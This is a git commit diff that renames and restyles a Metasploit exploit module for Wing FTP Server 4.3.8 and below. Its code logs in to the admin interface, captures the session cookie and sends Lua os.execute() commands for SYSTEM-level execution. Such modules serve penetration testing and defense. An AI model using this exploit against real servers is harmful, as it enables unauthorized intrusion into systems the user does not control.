Rename and apply rubocop style to wing_ftp_admin_exec

bug/bundler_fix
Spencer McIntyre 2014-08-29 13:42:11 -04:00
parent 02bbd53b82
commit 8095b4893c
1 changed files with 17 additions and 21 deletions

View File

@ -11,16 +11,16 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Wing FTP Server Remote Command Execution',
'Name' => 'Wing FTP Server Authenticated Command Execution',
'Description' => %q{
This module exploits the embedded Lua interpreter in the admin interface for
This module exploits the embedded Lua interpreter in the admin web interface for
versions 4.3.8 and below. When supplying a specially crafted HTTP POST request
an attacker can use os.execute() to execute arbitrary system commands on
the target with SYSTEM privileges.
},
'Author' =>
[
'Nicholas Nam <nick[at]executionflow.org>',
'Nicholas Nam <nick[at]executionflow.org>'
],
'License' => MSF_LICENSE,
'References' =>
@ -59,11 +59,11 @@ class Metasploit3 < Msf::Exploit::Remote
fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
elsif res.code != 200
fail_with(Failure::NotFound, "#{peer} - Admin login page was not found.")
elsif res.body =~ /Wing FTP Server Administrator/ and res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
elsif res.body =~ /Wing FTP Server Administrator/ && res.body =~ /2003-2014 <b>wftpserver.com<\/b>/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
def exploit
@ -73,27 +73,27 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Sending payload")
# Execute the cmdstager, max length of the commands is ~1500
execute_cmdstager({:flavor => :vbs, :linemax => 1500})
execute_cmdstager(flavor: :vbs, linemax: 1500)
end
def execute_command(cmd, opts = {})
def execute_command(cmd, _opts = {})
command = "os.execute('cmd /c #{cmd}')"
res = send_request_cgi({
res = send_request_cgi(
'uri' => '/admin_lua_script.html',
'method' => 'POST',
'cookie' => @session_cookie,
'vars_post' => { 'command' => command }
})
)
if res and res.code != 200
if res && res.code != 200
fail_with(Failure::Unkown, "#{peer} - Something went wrong.")
end
end
def authenticate(username, password)
print_status("#{peer} - Authenticating")
res = send_request_cgi({
res = send_request_cgi(
'uri' => '/admin_loginok.html',
'method' => 'POST',
'vars_post' => {
@ -103,25 +103,21 @@ class Metasploit3 < Msf::Exploit::Remote
'password_val' => password,
'submit_btn' => '+Login+'
}
})
)
uidadmin = ''
if !res
fail_with(Failure::Unreachable, "#{peer} - Admin login page was unreachable.")
elsif res.code == 200 and res.body =~ /location='main.html\?lang=english';/
elsif res.code == 200 && res.body =~ /location='main.html\?lang=english';/
res.get_cookies.split(';').each do |cookie|
cookie.split(',').each do |value|
if value.split('=')[0] =~ /UIDADMIN/
uidadmin = value.split('=')[1]
end
uidadmin = value.split('=')[1] if value.split('=')[0] =~ /UIDADMIN/
end
end
else
fail_with(Failure::NoAccess, "#{peer} - Authentication failed")
end
return "UIDADMIN=#{uidadmin}"
"UIDADMIN=#{uidadmin}"
end
end